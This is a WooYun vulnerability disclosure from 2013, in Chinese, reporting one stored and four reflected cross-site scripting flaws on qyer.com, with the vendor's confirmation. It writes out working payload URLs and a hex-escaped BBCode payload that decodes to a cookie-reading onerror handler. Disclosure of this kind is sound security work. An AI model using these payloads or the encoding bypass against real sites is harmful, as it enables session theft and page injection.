当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2013-044238

漏洞标题:穷游网存储型XSS+多个反射型xss

相关厂商:穷游网

漏洞作者: clown岩

提交时间:2013-11-28 17:03

修复时间:2014-01-12 17:04

公开时间:2014-01-12 17:04

漏洞类型:xss跨站脚本攻击

危害等级:中

自评Rank:8

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2013-11-28: 细节已通知厂商并且等待厂商处理中
2013-11-28: 厂商已经确认,细节仅向厂商公开
2013-12-08: 细节向核心白帽子及相关领域专家公开
2013-12-18: 细节向普通白帽子公开
2013-12-28: 细节向实习白帽子公开
2014-01-12: 细节向公众公开

简要描述:

穷游网 存储型XSS+多个反射型xss

详细说明:

穷游回答功能存储型xss提交地址:http://ask.qyer.com/question/717459.html
反射型XSS:
1.http://user.qyer.com/user_action_logininfo?xxcb=*/-->'"></script><script>alert(/xss/)</script>
2.http://plan.qyer.com/search.php?*/-->'"><script>alert(/xss/)</script>
3.http://user.qyer.com/subscibe.php?email=test123@163.com*/-->'"><iframe src=http://www.baidu.com width=500 height=500>
4.http://bbs.qyer.com/api.php?action=showcopytravelsnote&tid=862455&rf=bbs*/-->'"></script><script>alert(/xss/)</script>

漏洞证明:

穷游回答功能存储型xss提交地址:http://ask.qyer.com/question/717459.html
提交留言代码:[flash=222,111]http://aa\x22\x3e\x3c\x69\x6d\x67\x20\x73\x72\x63\x3d\x31\x20\x6f\x6e\x65\x72\x72\x6f\x72\x3d\x61\x6c\x65\x72\x74\x28\x64\x6f\x63\x75\x6d\x65\x6e\x74\x2e\x63\x6f\x6f\x6b\x69\x65\x29\x3e//.swf[/flash]

QQ截图20131127181845.jpg


存储型XSS弹窗:

QQ截图20131127181734.jpg


反射型xss1:http://user.qyer.com/user_action_logininfo?xxcb=*/-->'"></script><script>alert(/xss/)</script>

wooyun4.jpg


反射型xss2:http://plan.qyer.com/search.php?*/-->'"><script>alert(/xss/)</script>
怒弹20多次窗,不吹逼

wooyun.jpg


一看源代码你就知道

wooyun2.jpg


反射xss3 前面弹得太猛了 这次换个温柔的 意思一样滴 装装13
http://user.qyer.com/subscibe.php?email=test123@163.com*/-->'"><iframe src=http://www.baidu.com width=500 height=500>

wooyun3.jpg


反射xss4:http://bbs.qyer.com/api.php?action=showcopytravelsnote&tid=862455&rf=bbs*/-->'"></script><script>alert(/xss/)</script>

wooyun5.jpg

修复方案:

已将xss留言删除

版权声明:转载请注明来源 clown岩@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:6

确认时间:2013-11-28 17:14

厂商回复:

感谢您的关注,我们会尽快修改,谢谢~~

最新状态:

暂无